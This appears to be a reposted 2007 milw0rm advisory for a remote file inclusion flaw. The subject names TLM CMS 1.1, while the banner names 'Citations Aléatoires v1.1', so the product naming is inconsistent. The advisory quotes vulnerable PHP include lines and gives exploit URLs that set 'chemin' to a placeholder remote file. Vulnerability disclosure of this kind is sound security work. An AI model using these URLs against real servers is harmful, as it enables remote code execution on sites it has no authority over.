Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Title   :  VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities

Article System 0.1 (INCLUDE_DIR) Remote File Include Vulnerabilities

LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability

[SA23738] Quick.Cart "p" Cross-Site Scripting Vulnerability

From:	GolD_M <hacker__(at)_w.cn>
Date:	12.01.2007
Subject:	TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability

/###################################################################\
# Citations Al�atoires v1.1                                         #
# =========================================================         #
# Published : 2007-01-12                                            #
# Remote: Yes                                                       #
# Site:  ftp://ftp1.comscripts.com/PHP/1809_citation-11.zip         #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& AsbMay& ToOoFa& KaBaRa& str0ke #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# In :                                                              #
# /i-index.php                                                      #
# Line:                                                             #
# /38                                                               #
# Vulnerable Code:                                                  #
# include ("$chemin/themes/$App_Theme_Defaut/header.php") ;         #
# 3XP|0!T :                                                         #
# /i-index.php?chemin=EV!L.C0D3.TxT                                 #
# &                                                                 #
# In                                                                #
# /i-accueil.php                                                    #
# Line:                                                             #
# /13                                                               #
# Vulnerable Code:                                                  #
# include("$chemin/mod_news/index.php");                            #
# 3XP|0!T :                                                         #
# /i-accueil.php?chemin=EV!L.C0D3.TxT                               #
#        /#######################################\                  #
#        #         Tryag.Com & Dwrat.Com         #                  #
#        \#######################################/                  #
\###################################################################/

# milw0rm.com [2007-01-12]